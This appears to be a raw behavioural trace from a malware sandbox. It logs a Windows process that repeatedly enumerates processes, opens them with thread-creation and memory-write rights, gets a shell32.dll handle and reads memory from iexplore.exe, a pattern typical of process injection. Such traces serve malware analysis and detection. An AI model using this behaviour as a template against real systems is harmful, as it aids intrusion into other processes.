Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2147332096, size = 472	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2822592, size = 656	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2824600, size = 32	1	Fn Data
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2147344384, size = 472	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 594368, size = 656	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 596410, size = 32	1	Fn Data
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
System	Sleep	duration = 100 milliseconds (0.100 seconds)	1	Fn
Process	Enumerate Processes	-	3	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2147332096, size = 472	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2822592, size = 656	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2824600, size = 32	1	Fn Data
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 2147344384, size = 472	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 594368, size = 656	1	Fn Data
Memory	Read	process_name = c:\program files\internet explorer\iexplore.exe, address = 596410, size = 32	1	Fn Data
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Open	desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION	1	Fn
Module	Get Handle	module_name = c:\windows\system32\shell32.dll, base_address = 0x75bb0000	4	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
System	Sleep	duration = 100 milliseconds (0.100 seconds)	1	Fn
Process	Enumerate Processes	-	3	Fn
